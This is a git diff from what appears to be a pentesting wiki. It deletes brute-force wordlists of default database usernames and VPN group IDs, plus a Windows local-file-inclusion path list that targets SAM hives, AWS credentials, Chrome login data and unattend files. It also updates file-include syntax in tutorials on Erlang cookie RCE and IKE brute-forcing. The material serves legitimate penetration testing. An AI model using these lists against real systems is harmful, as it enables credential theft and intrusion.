-dpf
-DPF
-DPOND
-dsgateway
-DSGATEWAY
-dssys
-DSSYS
-dtsp
-DTSP
-DV7333
-DV7334
-DV810
-DV811
-DV812
-DV9
-DVP1
-eaa
-EAA
-eam
-EAM
-earlywatch
-EARLYWATCH
-east
-EAST
-ec
-EC
-ecx
-ECX
-EDR
-EDWEUL_US
-EDWREP
-EGC1
-EGD1
-EGM1
-EGO
-EGR1
-ejb
-EJB
-ejsadmin
-EJSADMIN
-emp
-EMP
-END1
-eng
-ENG
-eni
-ENI
-ENM1
-ENS1
-ENTMGR_CUST
-ENTMGR_PRO
-ENTMGR_TRAIN
-EOPP_PORTALADM
-EOPP_PORTALMGR
-EOPP_USER
-estoreuser
-ESTOREUSER
-EUL_US
-event
-EVENT
-evm
-EVM
-EXA1
-EXA2
-EXA3
-EXA4
-example
-EXAMPLE
-exfsys
-EXFSYS
-EXS1
-EXS2
-EXS3
-EXS4
-extdemo
-EXTDEMO
-extdemo2
-EXTDEMO2
-fa
-FA
-fem
-FEM
-FIA1
-fii
-FII
-finance
-FINANCE
-finprod
-FINPROD
-flm
-FLM
-fnd
-FND
-FNI1
-FNI2
-foo
-FOO
-FPA
-fpt
-FPT
-frm
-FRM
-frosty
-FROSTY
-FTA1
-fte
-FTE
-FUN
-fv
-FV
-FVP1
-GALLEN
-GCA1
-GCA2
-GCA3
-GCA9
-GCMGR1
-GCMGR2
-GCMGR3
-GCS
-GCS1
-GCS2
-GCS3
-GEORGIAWINE
-gl
-GL
-GLA1
-GLA2
-GLA3
-GLA4
-GLS1
-GLS2
-GLS3
-GLS4
-gma
-GMA
-GM_AWDA
-GM_COPI
-gmd
-GMD
-GM_DPHD
-gme
-GME
-gmf
-GMF
-gmi
-GMI
-gml
-GML
-GM_MLCT
-gmp
-GMP
-GM_PLADMA
-GM_PLADMH
-GM_PLCCA
-GM_PLCCH
-GM_PLCOMA
-GM_PLCOMH
-GM_PLCONA
-GM_PLCONH
-GM_PLNSCA
-GM_PLNSCH
-GM_PLSCTA
-GM_PLSCTH
-GM_PLVET
-gms
-GMS
-GM_SPO
-GM_STKH
-gpfd
-GPFD
-gpld
-GPLD
-gr
-GR
-GUEST
-hades
-HADES
-HCC
-hcpark
-HCPARK
-HHCFO
-hlw
-HLW
-hr
-HR
-hri
-HRI
-hvst
-HVST
-hxc
-HXC
-hxt
-HXT
-IA
-iba
-IBA
-IBC
-ibe
-IBE
-ibp
-IBP
-ibu
-IBU
-iby
-IBY
-icdbown
-ICDBOWN
-icx
-ICX
-idemo_user
-IDEMO_USER
-ieb
-IEB
-iec
-IEC
-iem
-IEM
-ieo
-IEO
-ies
-IES
-ieu
-IEU
-iex
-IEX
-ifssys
-IFSSYS
-igc
-IGC
-igf
-IGF
-igi
-IGI
-igs
-IGS
-igw
-IGW
-imageuser
-IMAGEUSER
-imc
-IMC
-imedia
-IMEDIA
-imt
-IMT
-INS1
-INS2
-#internal
-internal
-#INTERNAL
-INTERNAL
-inv
-INV
-IP
-ipa
-IPA
-ipd
-IPD
-iplanet
-IPLANET
-isc
-ISC
-ISTEWARD
-itg
-ITG
-ja
-JA
-jake
-JAKE
-JD7333
-JD7334
-JD9
-JDE
-JDEDBA
-je
-JE
-jg
-JG
-jill
-JILL
-jl
-JL
-JL
-jmuser
-JMUSER
-john
-JOHN
-JOHNINARI
-jones
-JONES
-jtf
-JTF
-JTI
-jtm
-JTM
-JTR
-jts
-JTS
-JUNK_PS
-JUSTOSHUM
-jward
-JWARD
-KELLYJONES
-KEVINDONS
-KPN
-kwalker
-KWALKER
-l2ldemo
-L2LDEMO
-LADAMS
-LBA
-lbacsys
-LBACSYS
-LDQUAL
-LHILL
-librarian
-LIBRARIAN
-LNS
-LQUINCY
-LSA
-manprod
-MANPROD
-mark
-MARK
-mascarm
-MASCARM
-master
-MASTER
-mddata
-MDDATA
-mddemo
-MDDEMO
-mddemo_clerk
-MDDEMO_CLERK
-mddemo_mgr
-MDDEMO_MGR
-mdsys
-MDSYS
-me
-ME
-mfg
-MFG
-mgr
-MGR
-MGR1
-MGR2
-MGR3
-MGR4
-mgwuser
-MGWUSER
-migrate
-MIGRATE
-MIKEIKEGAMI
-miller
-MILLER
-MJONES
-MLAKE
-MM1
-MM2
-MM3
-MM4
-MM5
-MMARTIN
-mmo2
-MMO2
-MOBILEADMIN
-modtest
-MODTEST
-moreau
-MOREAU
-mrp
-MRP
-msc
-MSC
-msd
-MSD
-mso
-MSO
-msr
-MSR
-MST
-mtssys
-MTSSYS
-mts_user
-MTS_USER
-mwa
-MWA
-mxagent
-MXAGENT
-names
-NAMES
-NEILKATSU
-neotix_sys
-NEOTIX_SYS
-nneul
-NNEUL
-nomeutente
-NOMEUTENTE
-nome_utilizador
-NOME_UTILIZADOR
-nom_utilisateur
-NOM_UTILISATEUR
-nume_utilizator
-NUME_UTILIZATOR
-oas_public
-OAS_PUBLIC
-OBJ7333
-OBJ7334
-OBJB733
-OCA
-ocitest
-OCITEST
-ocm_db_admin
-OCM_DB_ADMIN
-odm
-ODM
-odm_mtr
-ODM_MTR
-ods
-ODS
-odscommon
-ODSCOMMON
-ods_server
-ODS_SERVER
-oe
-OE
-oemadm
-OEMADM
-oemrep
-OEMREP
-okb
-OKB
-okc
-OKC
-oke
-OKE
-oki
-OKI
-OKL
-oko
-OKO
-okr
-OKR
-oks
-OKS
-okx
-OKX
-OL810
-OL811
-OL812
-OL9
-olapdba
-OLAPDBA
-olapsvr
-OLAPSVR
-olapsys
-OLAPSYS
-omwb_emulation
-OMWB_EMULATION
-ont
-ONT
-oo
-OO
-openspirit
-OPENSPIRIT
-opi
-OPI
-ORABAM
-ORABAMSAMPLES
-ORABPEL
-oracache
-ORACACHE
-oracle
-ORACLE
-oradba
-ORADBA
-ORAESB
-ORAOCA_PUBLIC
-oraprobe
-ORAPROBE
-oraregsys
-ORAREGSYS
-ORASAGENT
-orasso
-ORASSO
-orasso_ds
-ORASSO_DS
-orasso_pa
-ORASSO_PA
-orasso_ps
-ORASSO_PS
-orasso_public
-ORASSO_PUBLIC
-orastat
-ORASTAT
-orcladmin
-ORCLADMIN
-ordcommon
-ORDCOMMON
-ordplugins
-ORDPLUGINS
-ordsys
-ORDSYS
-ose$http$admin
-OSE$HTTP$ADMIN
-osm
-OSM
-osp22
-OSP22
-ota
-OTA
-outln
-OUTLN
-owa
-OWA
-OWAPUB
-owa_public
-OWA_PUBLIC
-owf_mgr
-OWF_MGR
-owner
-OWNER
-ozf
-OZF
-ozp
-OZP
-ozs
-OZS
-pa
-PA
-PABLO
-PAIGE
-PAM
-panama
-PANAMA
-PARRISH
-PARSON
-PAT
-PATORILY
-PATRICKSANCHEZ
-patrol
-PATROL
-PATSY
-paul
-PAUL
-PAULA
-PAXTON
-PCA1
-PCA2
-PCA3
-PCA4
-PCS1
-PCS2
-PCS3
-PCS4
-PD7333
-PD7334
-PD810
-PD811
-PD812
-PD9
-PDA1
-PEARL
-PEG
-PENNY
-PEOPLE
-PERCY
-perfstat
-PERFSTAT
-PERRY
-perstat
-PERSTAT
-PETE
-PEYTON
-PHIL
-PJI
-pjm
-PJM
-planning
-PLANNING
-plex
-PLEX
-plsql
-PLSQL
-pm
-PM
-pmi
-PMI
-pn
-PN
-po
-PO
-po7
-PO7
-po8
-PO8
-poa
-POA
-POLLY
-pom
-POM
-PON
-PORTAL
-portal30
-PORTAL30
-portal30_admin
-PORTAL30_ADMIN
-portal30_demo
-PORTAL30_DEMO
-portal30_ps
-PORTAL30_PS
-portal30_public
-PORTAL30_PUBLIC
-portal30_sso
-PORTAL30_SSO
-portal30_sso_admin
-PORTAL30_SSO_ADMIN
-portal30_sso_ps
-PORTAL30_SSO_PS
-portal30_sso_public
-PORTAL30_SSO_PUBLIC
-PORTAL_APP
-portal_demo
-PORTAL_DEMO
-PORTAL_PUBLIC
-portal_sso_ps
-PORTAL_SSO_PS
-pos
-POS
-powercartuser
-POWERCARTUSER
-PPM1
-PPM2
-PPM3
-PPM4
-PPM5
-primary
-PRIMARY
-PRISTB733
-PRISTCTL
-PRISTDTA
-PRODB733
-PRODCTL
-PRODDTA
-PRODUSER
-PROJMFG
-PRP
-PS
-PS810
-PS810CTL
-PS810DTA
-PS811
-PS811CTL
-PS811DTA
-PS812
-PS812CTL
-PS812DTA
-psa
-PSA
-psb
-PSB
-PSBASS
-PSEM
-PSFT
-PSFTDBA
-psp
-PSP
-PTADMIN
-PTCNE
-PTDMO
-PTE
-PTESP
-PTFRA
-PTG
-PTGER
-PTJPN
-PTUKE
-PTUPG
-PTWEB
-PTWEBSERVER
-pubsub
-PUBSUB
-pubsub1
-PUBSUB1
-pv
-PV
-PY7333
-PY7334
-PY810
-PY811
-PY812
-PY9
-qa
-QA
-qdba
-QDBA
-QOT
-qp
-QP
-QRM
-qs
-QS
-qs_adm
-QS_ADM
-qs_cb
-QS_CB
-qs_cbadm
-QS_CBADM
-qs_cs
-QS_CS
-qs_es
-QS_ES
-qs_os
-QS_OS
-qs_ws
-QS_WS
-re
-RE
-RENE
-repadmin
-REPADMIN
-rep_manager
-REP_MANAGER
-reports
-REPORTS
-reports_user
-REPORTS_USER
-rep_owner
-REP_OWNER
-rep_user
-REP_USER
-RESTRICTED_US
-rg
-RG
-rhx
-RHX
-rla
-RLA
-rlm
-RLM
-RM1
-RM2
-RM3
-RM4
-RM5
-rmail
-RMAIL
-rman
-RMAN
-ROB
-RPARKER
-rrs
-RRS
-RWA1
-SALLYH
-SAM
-sample
-SAMPLE
-sap
-SAP
-sapr3
-SAPR3
-SARAHMANDY
-SCM1
-SCM2
-SCM3
-SCM4
-scott
-SCOTT
-SDAVIS
-sdos_icsap
-SDOS_ICSAP
-secdemo
-SECDEMO
-SEDWARDS
-SELLCM
-SELLER
-SELLTREAS
-serviceconsumer1
-SERVICECONSUMER1
-SERVICES
-SETUP
-sh
-SH
-SID
-si_informtn_schema
-SI_INFORMTN_SCHEMA
-siteminder
-SITEMINDER
-SKAYE
-SKYTETSUKA
-slide
-SLIDE
-SLSAA
-SLSMGR
-SLSREP
-spierson
-SPIERSON
-SRABBITT
-SRALPHS
-SRAY
-SRIVERS
-SSA1
-SSA2
-SSA3
-SSC1
-SSC2
-SSC3
-SSOSDK
-ssp
-SSP
-SSS1
-starter
-STARTER
-strat_user
-STRAT_USER
-SUPPLIER
-SVM7333
-SVM7334
-SVM810
-SVM811
-SVM812
-SVM9
-SVMB733
-SVP1
-swpro
-SWPRO
-swuser
-SWUSER
-SY810
-SY811
-SY812
-SY9
-sympa
-SYMPA
-sys
-SYS
-SYS7333
-SYS7334
-sysadm
-SYSADM
-sysadmin
-SYSADMIN
-SYSB733
-sysman
-SYSMAN
-system
-SYSTEM
-tahiti
-TAHITI
-talbot
-TALBOT
-TDEMARCO
-tdos_icsap
-TDOS_ICSAP
-tec
-TEC
-test
-TEST
-TESTCTL
-TESTDTA
-testpilot
-TESTPILOT
-test_user
-TEST_USER
-thinsample
-THINSAMPLE
-tibco
-TIBCO
-tip37
-TIP37
-TRA1
-tracesvr
-TRACESVR
-travel
-TRAVEL
-TRBM1
-TRCM1
-TRDM1
-TRRM1
-tsdev
-TSDEV
-tsuser
-TSUSER
-turbine
-TURBINE
-TWILLIAMS
-UDDISYS
-ultimate
-ULTIMATE
-um_admin
-UM_ADMIN
-um_client
-UM_CLIENT
-user
-USER
-user0
-USER0
-user1
-USER1
-user2
-USER2
-user3
-USER3
-user4
-USER4
-user5
-USER5
-user6
-USER6
-user7
-USER7
-user8
-USER8
-user9
-USER9
-user_name
-USER_NAME
-usuario
-USUARIO
-utility
-UTILITY
-utlbstatu
-UTLBSTATU
-vea
-VEA
-veh
-VEH
-vertex_login
-VERTEX_LOGIN
-VIDEO31
-VIDEO4
-VIDEO5
-videouser
-VIDEOUSER
-vif_developer
-VIF_DEVELOPER
-viruser
-VIRUSER
-VP1
-VP2
-VP3
-VP4
-VP5
-VP6
-vpd_admin
-VPD_ADMIN
-vrr1
-VRR1
-WAA1
-WAA2
-WCRSYS
-webcal01
-WEBCAL01
-webdb
-WEBDB
-webread
-WEBREAD
-websys
-WEBSYS
-webuser
-WEBUSER
-WENDYCHO
-west
-WEST
-wfadmin
-WFADMIN
-wh
-WH
-wip
-WIP
-WIRELESS
-wkadmin
-WKADMIN
-wkproxy
-WKPROXY
-wksys
-WKSYS
-wk_test
-WK_TEST
-wkuser
-WKUSER
-wms
-WMS
-wmsys
-WMSYS
-wob
-WOB
-wps
-WPS
-wsh
-WSH
-wsm
-WSM
-www
-WWW
-wwwuser
-WWWUSER
-xademo
-XADEMO
-xdb
-XDB
-XDO
-xdp
-XDP
-xla
-XLA
-XLE
-XNB
-xnc
-XNC
-xni
-XNI
-xnm
-XNM
-xnp
-XNP
-xns
-XNS
-xprt
-XPRT
-xtr
-XTR
-YCAMPOS
-YSANCHEZ
-ZFA
-ZPB
-ZSA
-ZX
diff --git a/src/images/vpnIDs (1).txt b/src/images/vpnIDs (1).txt
deleted file mode 100644
index 9d70dde7d..000000000
--- a/src/images/vpnIDs (1).txt
+++ /dev/null
@@ -1,160 +0,0 @@
-GroupVPN
-Group-VPN
-EZ
-ez
-3000
-5000
-abc
-ABC
-RemoteAccess
-RemoteAccessVPN
-remoteaccessvpn
-access
-asa
-ASA
-pix
-PIX
-asa_vpn
-ASA_vpn
-ASA_VPN
-PIX_VPN
-pix_vpn
-vpn_asa
-vpn_pix
-VPN_ASA
-VPN_PIX
-aimatch
-asset
-assetlink
-backup
-backup1
-backup-server
-cisco
-clientvpn
-client-vpn
-data
-dataflux
-DefaultL2LGroup
-DefaultRAGroup
-DefaultWEBVPNGroup
-dfltgrppolicy
-DfltGrpPolicy
-dmz
-dmzvpn
-enter
-ENTER
-external
-externalvpn
-extvpn
-ext-vpn
-ezvpn
-ezVPN
-EZvpn
-EZVPN
-ezvpn-client
-EZVPN_GROUP
-failover
-group
-Group
-group1
-Group1
-group2
-Group2
-group3
-Group3
-group4
-Group4
-group5
-GROUP_EZVPN
-groupnew
-GroupPolicy
-GroupPolicy1
-GroupPolicy2
-GroupPolicy3
-GroupPolicy4
-GroupPolicy5
-groupvpn
-group-vpn
-hq
-hqvpn
-ideas
-ike
-inside
-internal
-internalvpn
-internal-vpn
-intvpn
-int-vpn
-ipsec
-ipsec-ra
-ipsec-tuneglgroup1
-ipsec-tunnelgroup
-ipsec-tunnelgroup2
-jmp
-link
-mygroup
-myGroup
-myGROUP
-MyGroup
-new
-newgroup
-old
-outside
-picosearch
-primary
-primary-vpn
-private
-public
-ravpn
-ra-vpn
-remote
-Remote
-remote-access
-remotevpn
-remote-vpn
-rename
-root
-sa
-secondary
-secondary_vpn
-secondary-vpn
-Secondary_VPN
-Secondary-VPN
-secure
-superteam
-teragram
-test
-testvpn
-test-vpn
-tunnel
-vpn
-vpngroup
-vpn-group
-VPNGroup
-vpnint
-vpn-int
-vpn_primary
-vpn-primary
-VPN_primary
-VPN_Primary
-VPN-Primary
-vpnremote
-vpn-remote
-vpntest
-vpn-test
-VPNtest
-VPN-test
-VPN-Test
-vpntunnel
-vsticorp
-webvpn
-xxx
-XXX
-manualVPN
-TunnelGroup1
-TunnelGroup2
-TunnelGroup3
-WAN GROUP
-WAN
-WANVPN
-VPNGROUP
\ No newline at end of file
diff --git a/src/images/vpnids.txt b/src/images/vpnids.txt
deleted file mode 100644
index 9d70dde7d..000000000
--- a/src/images/vpnids.txt
+++ /dev/null
@@ -1,160 +0,0 @@
-GroupVPN
-Group-VPN
-EZ
-ez
-3000
-5000
-abc
-ABC
-RemoteAccess
-RemoteAccessVPN
-remoteaccessvpn
-access
-asa
-ASA
-pix
-PIX
-asa_vpn
-ASA_vpn
-ASA_VPN
-PIX_VPN
-pix_vpn
-vpn_asa
-vpn_pix
-VPN_ASA
-VPN_PIX
-aimatch
-asset
-assetlink
-backup
-backup1
-backup-server
-cisco
-clientvpn
-client-vpn
-data
-dataflux
-DefaultL2LGroup
-DefaultRAGroup
-DefaultWEBVPNGroup
-dfltgrppolicy
-DfltGrpPolicy
-dmz
-dmzvpn
-enter
-ENTER
-external
-externalvpn
-extvpn
-ext-vpn
-ezvpn
-ezVPN
-EZvpn
-EZVPN
-ezvpn-client
-EZVPN_GROUP
-failover
-group
-Group
-group1
-Group1
-group2
-Group2
-group3
-Group3
-group4
-Group4
-group5
-GROUP_EZVPN
-groupnew
-GroupPolicy
-GroupPolicy1
-GroupPolicy2
-GroupPolicy3
-GroupPolicy4
-GroupPolicy5
-groupvpn
-group-vpn
-hq
-hqvpn
-ideas
-ike
-inside
-internal
-internalvpn
-internal-vpn
-intvpn
-int-vpn
-ipsec
-ipsec-ra
-ipsec-tuneglgroup1
-ipsec-tunnelgroup
-ipsec-tunnelgroup2
-jmp
-link
-mygroup
-myGroup
-myGROUP
-MyGroup
-new
-newgroup
-old
-outside
-picosearch
-primary
-primary-vpn
-private
-public
-ravpn
-ra-vpn
-remote
-Remote
-remote-access
-remotevpn
-remote-vpn
-rename
-root
-sa
-secondary
-secondary_vpn
-secondary-vpn
-Secondary_VPN
-Secondary-VPN
-secure
-superteam
-teragram
-test
-testvpn
-test-vpn
-tunnel
-vpn
-vpngroup
-vpn-group
-VPNGroup
-vpnint
-vpn-int
-vpn_primary
-vpn-primary
-VPN_primary
-VPN_Primary
-VPN-Primary
-vpnremote
-vpn-remote
-vpntest
-vpn-test
-VPNtest
-VPN-test
-VPN-Test
-vpntunnel
-vsticorp
-webvpn
-xxx
-XXX
-manualVPN
-TunnelGroup1
-TunnelGroup2
-TunnelGroup3
-WAN GROUP
-WAN
-WANVPN
-VPNGROUP
\ No newline at end of file
diff --git a/src/images/winlfi.txt b/src/images/winlfi.txt
deleted file mode 100644
index bd0b3746c..000000000
--- a/src/images/winlfi.txt
+++ /dev/null
@@ -1,218 +0,0 @@
-C:/$recycle.bin/s-1-5-18/desktop.ini
-C:/apache2/log/access.log
-C:/apache2/log/access_log
-C:/apache2/log/error.log
-C:/apache2/log/error_log
-C:/apache2/logs/access.log
-C:/apache2/logs/access_log
-C:/apache2/logs/error.log
-C:/apache2/logs/error_log
-C:/apache/log/access.log
-C:/apache/log/access_log
-C:/apache/log/error.log
-C:/apache/log/error_log
-C:/apache/logs/access.log
-C:/apache/logs/access_log
-C:/apache/logs/error.log
-C:/apache/logs/error_log
-C:/apache/php/php.ini
-C:/boot.ini
-C:/documents and settings/administrator/desktop/desktop.ini
-C:/documents and settings/administrator/ntuser.dat
-C:/documents and settings/administrator/ntuser.ini
-C:/home2/bin/stable/apache/php.ini
-C:/home/bin/stable/apache/php.ini
-C:/inetpub/logs/logfiles
-C:/inetpub/wwwroot/global.asa
-C:/inetpub/wwwroot/index.asp
-C:/inetpub/wwwroot/web.config
-C:/log/access.log
-C:/log/access_log
-C:/log/error.log
-C:/log/error_log
-C:/log/httpd/access_log
-C:/log/httpd/error_log
-C:/logs/access.log
-C:/logs/access_log
-C:/logs/error.log
-C:/logs/error_log
-C:/logs/httpd/access_log
-C:/logs/httpd/error_log
-C:/MININT/SMSOSD/OSDLOGS/VARIABLES.DAT
-C:/mysql/bin/my.ini
-C:/mysql/data/hostname.err
-C:/mysql/data/mysql.err
-C:/mysql/data/mysql.log
-C:/mysql/my.cnf
-C:/mysql/my.ini
-C:/opt/xampp/logs/access.log
-C:/opt/xampp/logs/access_log
-C:/opt/xampp/logs/error.log
-C:/opt/xampp/logs/error_log
-C:/php4/php.ini
-C:/php4/sessions/
-C:/php5/php.ini
-C:/php5/sessions/
-C:/php/php.ini
-C:/php/sessions/
-C:/programdata/mcafee/common framework/sitelist.xml
-C:/program files/apache group/apache2/conf/httpd.conf
-C:/program files/apache group/apache/conf/access.log
-C:/program files/apache group/apache/conf/error.log
-C:/program files/apache group/apache/conf/httpd.conf
-C:/program files/apache group/apache/logs/access.log
-C:/program files/apache group/apache/logs/error.log
-C:/program files/filezilla server/filezilla server.xml
-C:/program files/mysql/data/hostname.err
-C:/program files/mysql/data/mysql-bin.log
-C:/program files/mysql/data/mysql.err
-C:/program files/mysql/data/mysql.log
-C:/program files/mysql/my.cnf
-C:/program files/mysql/my.ini
-C:/program files/mysql/mysql server 5.0/data/hostname.err
-C:/program files/mysql/mysql server 5.0/data/mysql-bin.log
-C:/program files/mysql/mysql server 5.0/data/mysql.err
-C:/program files/mysql/mysql server 5.0/data/mysql.log
-C:/program files/mysql/mysql server 5.0/my.cnf
-C:/program files/mysql/mysql server 5.0/my.ini
-C:/program files/mysql/mysql server 5.1/my.ini
-C:/program files (x86)/apache group/apache2/conf/httpd.conf
-C:/program files (x86)/apache group/apache/conf/access.log
-C:/program files (x86)/apache group/apache/conf/error.log
-C:/program files (x86)/apache group/apache/conf/httpd.conf
-C:/program files (x86)/apache group/apache/logs/access.log
-C:/program files (x86)/apache group/apache/logs/error.log
-C:/program files (x86)/filezilla server/filezilla server.xml
-C:/program files (x86)/mysql/data/hostname.err
-C:/program files (x86)/mysql/data/mysql-bin.log
-C:/program files (x86)/mysql/data/mysql.err
-C:/program files (x86)/mysql/data/mysql.log
-C:/program files (x86)/mysql/my.cnf
-C:/program files (x86)/mysql/my.ini
-C:/program files (x86)/mysql/mysql server 5.0/data/hostname.err
-C:/program files (x86)/mysql/mysql server 5.0/data/mysql-bin.log
-C:/program files (x86)/mysql/mysql server 5.0/data/mysql.err
-C:/program files (x86)/mysql/mysql server 5.0/data/mysql.log
-C:/program files (x86)/mysql/mysql server 5.0/my.cnf
-C:/program files (x86)/mysql/mysql server 5.0/my.ini
-C:/program files (x86)/mysql/mysql server 5.1/my.ini
-C:/program files (x86)/xampp/apache/conf/httpd.conf
-C:/program files/xampp/apache/conf/httpd.conf
-C:/sysprep.inf
-C:/sysprep/sysprep.inf
-C:/sysprep/sysprep.xml
-C:/sysprep.xml
-C:/system32/inetsrv/metabase.xml
-C:/system volume information/wpsettings.dat
-C:/unattended.txt
-C:/unattended.xml
-C:/unattend.txt
-C:/unattend.xml
-C:/users/administrator/appdata/local/google/chrome/user data/default/bookmarks
-C:/users/administrator/appdata/local/google/chrome/user data/default/bookmarks.bak
-C:/users/administrator/appdata/local/google/chrome/user data/default/cookies
-C:/users/administrator/appdata/local/google/chrome/user data/default/history
-C:/users/administrator/appdata/local/google/chrome/user data/default/last session
-C:/users/administrator/appdata/local/google/chrome/user data/default/login data
-C:/users/administrator/appdata/local/google/chrome/user data/default/preferences
-C:/users/administrator/appdata/local/google/chrome/user data/default/secure preferences
-C:/users/administrator/appdata/local/google/chrome/user data/default/top sites
-C:/users/administrator/appdata/Roaming/Microsoft/Windows/PowerShell/PSReadline/ConsoleHost_history.txt
-C:/users/administrator/.aws/config
-C:/users/administrator/.aws/credentials
-C:/users/administrator/desktop/desktop.ini
-C:/users/administrator/desktop/proof.txt
-C:/users/administrator/.elasticbeanstalk/config
-C:/users/administrator/ntuser.dat
-C:/users/administrator/ntuser.ini
-C:/windows/csc/v2.0.6/pq
-C:/windows/csc/v2.0.6/sm
-C:/windows/debug/netsetup.log
-C:/windows/explorer.exe
-C:/windows/iis5.log
-C:/windows/iis6.log
-C:/windows/iis7.log
-C:/windows/iis8.log
-C:/windows/notepad.exe
-C:/windows/panther/setupinfo
-C:/windows/panther/setupinfo.bak
-C:/windows/panther/sysprep.inf
-C:/windows/panther/sysprep.xml
-C:/windows/panther/unattended.txt
-C:/windows/panther/unattended.xml
-C:/windows/panther/unattend/setupinfo
-C:/windows/panther/unattend/setupinfo.bak
-C:/windows/panther/unattend/sysprep.inf
-C:/windows/panther/unattend/sysprep.xml
-C:/windows/panther/unattend.txt
-C:/windows/panther/unattend/unattended.txt
-C:/windows/panther/unattend/unattended.xml
-C:/windows/panther/unattend/unattend.txt
-C:/windows/panther/unattend/unattend.xml
-C:/windows/panther/unattend.xml
-C:/windows/php.ini
-C:/windows/repair/sam
-C:/windows/repair/security
-C:/windows/repair/software
-C:/windows/repair/system
-C:/windows/system32/config/appevent.evt
-C:/windows/system32/config/default.sav
-C:/windows/system32/config/regback/default
-C:/windows/system32/config/regback/sam
-C:/windows/system32/config/regback/security
-C:/windows/system32/config/regback/software
-C:/windows/system32/config/regback/system
-C:/windows/system32/config/sam
-C:/windows/system32/config/secevent.evt
-C:/windows/system32/config/security.sav
-C:/windows/system32/config/software.sav
-C:/windows/system32/config/system
-C:/windows/system32/config/system.sa
-C:/windows/system32/config/system.sav
-C:/windows/system32/drivers/etc/hosts
-C:/windows/system32/eula.txt
-C:/windows/system32/inetsrv/config/applicationhost.config
-C:/windows/system32/inetsrv/config/schema/aspnet_schema.xml
-C:/windows/system32/license.rtf
-C:/windows/system32/logfiles/httperr/httperr1.log
-C:/windows/system32/sysprep.inf
-C:/windows/system32/sysprepsysprep.inf
-C:/windows/system32/sysprep/sysprep.xml
-C:/windows/system32/sysprepsysprep.xml
-C:/windows/system32/sysprepunattended.txt
-C:/windows/system32/sysprepunattended.xml
-C:/windows/system32/sysprepunattend.txt
-C:/windows/system32/sysprepunattend.xml
-C:/windows/system32/sysprep.xml
-C:/windows/system32/unattended.txt
-C:/windows/system32/unattended.xml
-C:/windows/system32/unattend.txt
-C:/windows/system32/unattend.xml
-C:/windows/system.ini
-C:/windows/temp/
-C:/windows/windowsupdate.log
-C:/windows/win.ini
-C:/winnt/php.ini
-C:/winnt/win.ini
-C:/xampp/apache/bin/php.ini
-C:/xampp/apache/conf/httpd.conf
-C:/xampp/apache/logs/access.log
-C:/xampp/apache/logs/error.log
-C:/xampp/filezillaftp/filezilla server.xml
-C:/xampp/filezillaftp/logs
-C:/xampp/filezillaftp/logs/access.log
-C:/xampp/filezillaftp/logs/error.log
-C:/xampp/mercurymail/logs/access.log
-C:/xampp/mercurymail/logs/error.log
-C:/xampp/mercurymail/mercury.ini
-C:/xampp/mysql/data/mysql.err
-C:/xampp/phpmyadmin/config.inc
-C:/xampp/phpmyadmin/config.inc.php
-C:/xampp/phpmyadmin/phpinfo.php
-C:/xampp/php/php.ini
-C:/xampp/sendmail/sendmail.ini
-C:/xampp/sendmail/sendmail.log
-C:/xampp/tomcat/conf/tomcat-users.xml
-C:/xampp/tomcat/conf/web.xml
-C:/xampp/webalizer/webalizer.conf
-C:/xampp/webdav/webdav.txt
diff --git a/src/mobile-pentesting/android-app-pentesting/frida-tutorial/objection-tutorial.md b/src/mobile-pentesting/android-app-pentesting/frida-tutorial/objection-tutorial.md
index 32d3f5455..9aa7239e3 100644
--- a/src/mobile-pentesting/android-app-pentesting/frida-tutorial/objection-tutorial.md
+++ b/src/mobile-pentesting/android-app-pentesting/frida-tutorial/objection-tutorial.md
@@ -2,8 +2,6 @@
{{#include ../../../banners/hacktricks-training.md}}
-
-
## **Introduction**
**objection - Runtime Mobile Exploration**
@@ -20,7 +18,9 @@ The **goal** of **objection** is let the user call the **main actions that offer
For this tutorial I am going to use the APK that you can download here:
-{% file src="../../../images/app-release.zip" %}
+{{#file}}
+app-release.zip
+{{#endfile}}
Or from its [original repository ](https://github.com/asvid/FridaApp)(download app-release.apk)
@@ -275,9 +275,4 @@ exit
- You can't use the instaces of the classes to call functions of the instance. And you can't create new instances of classes and use them to call functions.
- There isn't a shortcut (like the one for sslpinnin) to hook all the common crypto methods being used by the application to see cyphered text, plain text, keys, IVs and algorithms used.
-
-
{{#include ../../../banners/hacktricks-training.md}}
-
-
-
diff --git a/src/network-services-pentesting/4369-pentesting-erlang-port-mapper-daemon-epmd.md b/src/network-services-pentesting/4369-pentesting-erlang-port-mapper-daemon-epmd.md
index 3f9eac8b1..ca7be3409 100644
--- a/src/network-services-pentesting/4369-pentesting-erlang-port-mapper-daemon-epmd.md
+++ b/src/network-services-pentesting/4369-pentesting-erlang-port-mapper-daemon-epmd.md
@@ -65,7 +65,9 @@ At last, we can start an erlang shell on the remote system.
More information in [https://insinuator.net/2017/10/erlang-distribution-rce-and-a-cookie-bruteforcer/](https://insinuator.net/2017/10/erlang-distribution-rce-and-a-cookie-bruteforcer/)\
The author also share a program to brutforce the cookie:
-{% file src="../images/epmd_bf-0.1.tar.bz2" %}
+{{#file}}
+epmd_bf-0.1.tar.bz2
+{{#endfile}}
## Local Connection
@@ -93,6 +95,3 @@ msf5> use exploit/multi/misc/erlang_cookie_rce
- `port:4369 "at port"`
{{#include ../banners/hacktricks-training.md}}
-
-
-
diff --git a/src/network-services-pentesting/ipsec-ike-vpn-pentesting.md b/src/network-services-pentesting/ipsec-ike-vpn-pentesting.md
index 1b31eb61f..27fcd8726 100644
--- a/src/network-services-pentesting/ipsec-ike-vpn-pentesting.md
+++ b/src/network-services-pentesting/ipsec-ike-vpn-pentesting.md
@@ -148,7 +148,9 @@ while read line; do (echo "Found ID: $line" && sudo ike-scan -M -A -n $line
Or use this dict (is a combination of the other 2 dicts without repetitions):
-{% file src="../images/vpnIDs.txt" %}
+{{#file}}
+vpnIDs.txt
+{{#endfile}}
### Bruteforcing ID with Iker
@@ -269,6 +271,3 @@ Ensure that actual, secure values are used to replace the placeholders when conf
- `port:500 IKE`
{{#include ../banners/hacktricks-training.md}}
-
-
-
diff --git a/src/network-services-pentesting/pentesting-ftp/README.md b/src/network-services-pentesting/pentesting-ftp/README.md
index 7e0f721ed..514247b79 100644
--- a/src/network-services-pentesting/pentesting-ftp/README.md
+++ b/src/network-services-pentesting/pentesting-ftp/README.md
@@ -184,9 +184,9 @@ Its highly probably that this **will throw an error like** _**Socket not writabl
- If you are sending an HTTP request, **put the same request one after another** until **\~0.5MB** at least. Like this:
-{% file src="../../images/posts.txt" %}
+{{#file}}
posts.txt
-{% endfile %}
+{{#endfile}}
- Try to **fill the request with "junk" data relative to the protocol** (talking to FTP maybe just junk commands or repeating the `RETR`instruction to get the file)
- Just **fill the request with a lot of null characters or others** (divided on lines or not)
